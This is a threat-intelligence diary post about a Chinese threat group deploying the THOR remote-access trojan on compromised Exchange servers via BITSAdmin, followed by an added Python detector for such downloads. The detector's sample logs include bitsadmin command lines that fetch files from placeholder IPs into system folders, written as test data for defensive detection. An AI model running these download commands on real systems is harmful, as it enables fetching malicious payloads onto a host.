[MART] - Daily Diary #314 - PKPLUG Group Is Using The THOR RAT in Recent Attacks
CTAS-MAT
ctas-mat at appgate.com
Wed Jul 28 22:12:24 UTC 2021
Hello,
I hope everyone is doing well!
Below is the entry for today.
07/28/2021 - Diary entry #314:
The PKPLUG group, also known as MustangPanda and HoneyMyte, is a Chinese threat actor linked to the attacks on Microsoft Exchange servers in March 2021. During those attacks the group deployed a variant of the PlugX malware named THOR.
THOR is a RAT that was used as a post-exploitation tool on one of the compromised servers. This variant can deliver additional malicious payloads, and several of its samples are associated with the PlugX C&C infrastructure.
To evade antivirus detection on the compromised Microsoft Exchange servers, the group used the "living off the land" technique covered in our Daily Diary #247: abusing a legitimate Windows binary, in this case BITSAdmin, to download the payload containing the THOR malware.
Kind Regards,
Felipe Tarijon de Almeida
Malware Analyst
Appgate
E: felipe.tarijon at appgate.com
O: +55 11 97467 9549
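As an added example (it is not part of the diary entry and not code from any published THOR analysis), the following Python detector looks for the BITSAdmin download pattern described above in process-creation records. The record layout, the sample command lines, the IP addresses, and the severity rule (escalate when the parent is the IIS worker process w3wp.exe, which is where a web shell on an Exchange server would spawn from) are all assumptions made for illustration, not indicators from the THOR reporting. The example also covers `/addfile`, the other BITSAdmin verb that attaches a remote file to a job, which the diary does not mention.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed process-creation records (fields loosely modelled on Sysmon
# Event ID 1: Image, CommandLine, ParentImage). The URLs, paths and IPs are
# invented for this example and are not indicators from the THOR reporting.
SAMPLE_LOGS = [
    "Image=C:\\Windows\\System32\\bitsadmin.exe | "
    "CommandLine=bitsadmin /transfer upd /download /priority high "
    "http://203.0.113.5/update.bin C:\\Windows\\Temp\\update.bin | "
    "ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe",
    "Image=C:\\Windows\\System32\\bitsadmin.exe | "
    "CommandLine=bitsadmin /addfile job2 https://203.0.113.7/a.dat C:\\Users\\Public\\a.dat | "
    "ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\bitsadmin.exe | "
    "CommandLine=bitsadmin /list /allusers | "
    "ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | "
    "CommandLine=\"chrome.exe\" https://example.com | "
    "ParentImage=C:\\Windows\\explorer.exe",
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# BITSAdmin verbs that add a remote-to-local transfer to a job.
DOWNLOAD_VERBS = ("/transfer", "/addfile")
# Parent processes that make a BITS download especially suspicious on an
# Exchange server (hypothetical rule: a web shell runs inside the IIS worker).
SUSPICIOUS_PARENTS = {"w3wp.exe"}


@dataclass
class Finding:
    image: str
    parent: str
    urls: List[str]
    severity: str
    command_line: str


def parse_record(line: str) -> Dict[str, str]:
    """Split 'Key=value | Key=value' into a dict; values may contain '='."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_bits_download(record: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when bitsadmin.exe is used to fetch a remote URL."""
    image = record.get("Image", "")
    cmd = record.get("CommandLine", "")
    parent = record.get("ParentImage", "")
    if basename(image) != "bitsadmin.exe":
        return None
    # Compare whole tokens so a URL path containing '/transfer' cannot match.
    tokens = cmd.lower().split()
    if not any(verb in tokens for verb in DOWNLOAD_VERBS):
        return None
    urls = URL_RE.findall(cmd)
    if not urls:
        return None
    severity = "high" if basename(parent) in SUSPICIOUS_PARENTS else "medium"
    return Finding(image, parent, urls, severity, cmd)


def scan(lines: List[str]) -> List[Finding]:
    """Run the detector over raw records and collect the hits in order."""
    findings = []
    for line in lines:
        hit = detect_bits_download(parse_record(line))
        if hit is not None:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f.severity}] {basename(f.parent)} -> bitsadmin fetching "
              f"{', '.join(f.urls)}")
```

On a real deployment the record parser would be replaced by the fields of Sysmon Event ID 1 or Security event 4688 (with command-line auditing enabled), and the parent-process rule extended to whatever service hosts are expected on the monitored server; the token-based verb match and URL extraction carry over unchanged.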